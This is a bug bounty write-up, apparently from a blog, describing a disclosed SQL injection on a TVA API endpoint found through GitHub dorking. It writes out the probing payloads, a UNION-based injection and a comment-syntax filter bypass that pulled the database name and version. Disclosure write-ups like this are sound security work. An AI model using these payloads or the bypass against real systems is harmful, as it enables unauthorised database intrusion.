• I found an SQL injection using Github dorking and here's my short story.
    BugBounty 2022. 4. 28. 08:23

    Never forget about Github dorking.
    Last year, I was invited by TVA VDP via Hackerone . After reviewing their scope, I started my recon flow.

    I always start with github dorking because most of the time it contains low hanging fruits and sometimes hidden subdomains. 

    After a few minutes, I discovered an interesting endpoint within a hidden subdomain. When I say hidden, I mean a subdomain that can't be found via ordinary tools.

    When gathering subdomains, never depend on automatic tools only. 

    Tip: use bing.com search engine also, it's helpful because sometimes it gives you hidden endpoints too.

    The moment I saw the endpoint, I thought of SQL injection. How? Well because it looks like the code GVDA1 is being checked in the database.

    I added a single quote and the page responded with an MSSQL database error message

    https://soa.tva.gov/api/river/observed-data/PICT1'  -> MSSQL database error message
    https://soa.tva.gov/api/river/observed-data/PICT1'-- - -> No Error
    https://soa.tva.gov/api/river/observed-data/PICT1' ORDER BY 2 -- - -> Database Error
    https://soa.tva.gov/api/river/observed-data/PICT1' ORDER BY 1-- - -> No Error
    https://soa.tva.gov/api/river/observed-data/PICT1' UNION SELECT db_name()-- - -> 400 CODE Error

    I injected some Union payloads and it turned out that there was something blocking them all. After trying a few more payloads, I managed to craft a bypass which looks like this /*!50000Union*/

    https://soa-accp.glbx.tva.gov/api/river/observed-data/-PICT1'+%2f*!50000union*%2f+SELECT+db_name()-- -

    Responded With Database Name



    https://soa-accp.glbx.tva.gov/api/river/observed-data/-PICT1'+%2f*!50000union*%2f+SELECT+@@version-- -

    Responded With MSSQL Version

    Microsoft SQL Server 2017 (RTM-CU22-GDR) (KB4583457) - 14.0.3370.1 (X64) \n\tNov 6 2020 18:19:52 \n\tCopyright (C) 2017 Microsoft Corporation\n\tEnterprise Edition (64- bit) on Windows Server 2012 R2 Standard 6.3 < X64 > (Build 9600: ) (Hypervisor)\n


    Reported on Mar 15th 2021 

    Resolved on Mar 31st 2021  

    Agreed to disclose Apr 26th 2022  

    It's a small writeup but I want to teach you two things: 

    - Always do github dorking the in early stages of your recon. 
    - There are plenty of bypasses out there, try to use them all . 
     Last but not least, here are some useful resources to learn about SQL injection:




    Github Dorks:



    See you soon.



    댓글 0

Designed by Tistory.